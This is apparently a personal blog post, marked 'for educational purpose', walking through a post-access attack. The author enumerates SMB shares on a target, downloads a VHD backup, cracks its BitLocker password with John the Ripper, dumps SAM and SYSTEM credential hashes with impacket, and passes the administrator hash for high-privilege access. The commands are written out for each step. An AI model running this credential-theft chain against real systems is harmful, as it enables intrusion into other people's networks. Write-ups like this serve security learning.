How i exfiltrate file VHD data from target and dump the victim’s credentials
hello everyone, this time I will make an article about the process of exfiltrating data from a target and utilizing that data to find victim credentials that can be used as access to their system.
Disclaimer: Only for educational purpose.Introduction
VHD? A virtual hard disk (VHD) is a disk image file format for storing the entire contents of a computer’s hard drive. The disk image, sometimes called a virtual machine (VM), replicates an existing hard drive, including all data and structural elements. It can be stored in any location accessible to the physical host, and it is also transportable, meaning it can be stored and moved with a USB flash memory device.
Windows User POV : VHDs appear just like physical disks in Disk Management. When a VHD has been attached and made available to the system for use, it appears blue. If the disk is detached and made unavailable, its icon reverts to gray.
Proof Of Concept
Note: I have done reconnaissance and initial access to the target. in this step I will not explain how I do reconnaissance and initial access, here I only explain how to exfiltrate data and utilize it.
After I get a credential from initial access, I try to do reconnaissance again to see what smb folders this user can access. it can be seen that the user david has read access to the david & IPCR$ folder.
crackmapexec smb 10.xxx.xxx.xxx -u david -p xxxxxxxx --shares
then I accessed the folder using smbclient to see the data in it. it can be seen that I have found a .vhd file in it and I downloaded the vhd file with the GET command
smbclient -U david \\\\IPTARGET\\david -t 3600
After getting the .vhd file I extracted it using 7zip, and got 2 image files.
After analyzing the files, it can be concluded that the 2 files are bitlocker files inside a .vhd file. let’s leave that file for a moment, I tried to attach the .vhd file to my local windows.
when attaching the vhd file. a popup appears that requires a password to open it. let’s go back to the 2 img files that we extracted earlier.
After figuring out that the file was a bitlocker, I tried to figure out how bitlockers work and how to crack them.
I used john the ripper (JtR) to crack the bitlocker file. let’s see how I do it.
bitlocker2john -i <file.name>
Look. I got a hash from file number 1, this is getting interesting. Let’s do some cracking on the hash.
john --wordlist=rockyou_mutation.txt bitlocker.hash
after successfully cracking the hash, I put the cracking result in the bitlocker popup file. and yes I successfully to open it and see the contents of the backup.vhd file. AND GOTCHA! i got SAM DAN SYSTEM FILE!!!!!
I then moved the SAM and SYSTEM files to KALI OS to dumping the credentials from the SAM file using impacket
impacket-secretdump -sam SAM -system SYSTEM LOCAL
After getting the administrator hash, I pass the hash using impacket-psexec to access the target server with high privileges.
I hope this article can help readers to get a new point of view. thanks for reading!
